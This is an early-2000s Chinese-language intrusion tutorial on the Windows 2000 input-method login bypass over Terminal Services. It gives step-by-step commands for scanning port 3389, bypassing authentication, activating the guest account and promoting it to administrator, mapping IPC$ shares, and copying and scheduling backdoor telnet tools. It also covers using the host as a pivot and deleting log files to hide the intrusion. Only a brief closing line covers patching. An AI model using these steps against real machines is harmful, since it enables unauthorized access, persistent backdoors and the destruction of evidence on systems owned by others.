WIN2000中文簡體版存在的輸入法漏洞，可以使本地用戶繞過身分驗證機制進入系統(tǒng)內(nèi)部。經(jīng)實驗，WIN2000中文簡體版的終端服務(wù)，在遠程操作時仍然存在這一漏洞，而且危害更大。
WIN2000的終端服務(wù)功能，能使系統(tǒng)管理員對WIN2000進行遠程操作，采用的是圖形界面，能使用戶在遠程控制計算機時功能與在本地使用一樣，其默認端口為3389，用戶只要裝了WIN2000的客戶端連接管理器就能與開啟了該服務(wù)的計算機相聯(lián)。因此這一漏洞使終端服務(wù)成為WIN2000的合法木馬。
工具：客戶端連接管理器，下載地址：http://minisql.51.net/rj/WIN.zip，端口掃描器一個，推薦使用：流光、網(wǎng)絡(luò)刺客2、superscan。
入侵步驟： 一，獲得管理員賬號。
我們先對一個網(wǎng)段進行掃描，掃描端口設(shè)為3389，運行客戶端連接管理器，將掃描到的任一地址加入到，設(shè)置好客戶端連接管理器，然后與服務(wù)器連結(jié)。幾秒鐘后，屏幕上顯示出WIN2000登錄界面（如果發(fā)現(xiàn)是英文或繁體中文版，放棄，另換一個地址），用CTRL SHIFT快速切換輸入法，切換至全拼，這時在登錄界面左下角將出現(xiàn)輸入法狀態(tài)條（如果沒有出現(xiàn)，請耐心等待，因為對方的數(shù)據(jù)流傳輸還有一個過程）。用右鍵點擊狀態(tài)條上的微軟徽標，彈出“幫助”（如果發(fā)現(xiàn)“幫助”呈灰色，放棄，因為對方很可能發(fā)現(xiàn)并已經(jīng)補上了這個漏洞），打開“幫助”一欄中“操作指南”，在最上面的任務(wù)欄點擊右鍵，會彈出一個菜單，打開“跳至URL”。此時將出現(xiàn)WIN2000的系統(tǒng)安裝路徑和要求我們填入的路徑的空白欄。比如，該系統(tǒng)安裝在Ｃ盤上，就在空白欄中填入"c:\winnt\system32"。然后按“確定”，于是我們就成功地繞過了身份驗證，進入了系統(tǒng)的SYSTEM32目錄。
現(xiàn)在我們要獲得一個賬號，成為系統(tǒng)的合法用戶。在該目錄下找到"net.exe"，為"net.exe"創(chuàng)建一個快捷方式，右鍵點擊該快捷方式，在“屬性”－>“目標”－>c:\winnt\system32\net.exe后面空一格，填入"user
guest /active :yes"點“確定”。這一步驟目的在于用net.exe激活被禁止使用的guest賬戶，當然也可以利用"user
用戶名　密碼／add"，創(chuàng)建一個新賬號，但容易引起網(wǎng)管懷疑。運行該快捷方式，此時你不會看到運行狀態(tài)，但guest用戶已被激活。然后又修改該快捷方式，填入"user
guest 密碼"，運行，于是guest便有了密碼。最后，再次修改，填入“localgroup administrators guest
/add，將guest變成系統(tǒng)管理員。
注意事項：１、在這過程中，如果對方管理員正在使用終端服務(wù)管理器，他將看到你所打開的進程id，你的ip和機器名，甚至能夠給你發(fā)送消息。
２、終端服務(wù)器在驗證你的身份的時候只留給了你一分鐘的時間，在這一分鐘內(nèi)如果你不能完成上述操作，你只能再連結(jié)。
３、你所看到的圖像與操作會有所延遲，這受網(wǎng)速的影響。二，創(chuàng)建跳板。
再次登錄終端用務(wù)器，以"guest"身份進入，此時guest已是系統(tǒng)管理員，已具備一切可執(zhí)行權(quán)。打開“控制面板”，進入“網(wǎng)絡(luò)和拔號連接”，在“本地連接”或“拔號連接”中查看屬性，看對方是否選擇“Microsoft
網(wǎng)絡(luò)的文件和打印機共享”，如果沒有，就打上勾。對方如果使用的是拔號上網(wǎng)，下次拔號網(wǎng)絡(luò)共享才會打開。退出對方系統(tǒng)，在本地機命令提示符下，輸入 net use
\\IP Address\IPC$ ["password"] /user:"guset"，通過IPC的遠程登陸就成功了。
登陸成功之后先復(fù)制一個Telnet的程序上去（小榕流光安裝目錄下的Tools目錄里的Srv.exe,另外，還有ntml.xex，一會要用），這個程序是在對方上面開一個Telnet服務(wù)，端口是99。
copy c:\hack\srv.exe \\***.***.***.***\admin$ 然后利用定時服務(wù)啟動它，先了解對方的時間： net time
\\***.***.***.*** 顯示： \\***.***.***.*** 的當前時間是 2001/1/8 下午 08:55 命令成功完成。
然后啟動srv.exe: at \\***.***.***.*** 09:00 srv.exe　 顯示： 新加了一項作業(yè)，其作業(yè) ID = 0
過幾分鐘后，telnet ***.***.***.*** 99 這里不需要驗證身份，直接登錄，顯示： c:\winnt:\system32>
我們就成功登陸上去了。然后又在本地打開命令提示符，另開一個窗口，輸入： copy c:\hack\ntlm.exe
\\211.21.193.202\admin$ 把事先存放在hack目錄里的ntlm.exe拷過去。然后又回到剛才的telnet窗口，運行ntlm.exe
C:\WINNT\system32>ntlm 顯示： Windows 2000 Telnet Dump, by Assassin, All Rights
Reserved. Done! C:\WINNT\system32> C:\WINNT\system32>
好，現(xiàn)在我們來啟動WIN2000本身的telnet，首先終止srv.exe的telnet服務(wù)： net stop
telnet　系統(tǒng)告訴你并沒有啟動telnet，不理它，繼續(xù)： net start
telnet　這次真的啟動了telnet，我們可以在另開的命令提示符窗口telnet到對方的
23端口，驗證身份，輸入我們的guest賬號和密碼，它就真正成為我們的跳板了。我們可以利用它到其它的主機去。三、掃除腳?。?刪除為net.exe
創(chuàng)建的快捷方式，刪除winnt\system32\logfiles下邊的日志文件補漏方法： 1、打補丁 2、刪除輸入法幫助文件 3、停止終端服務(wù)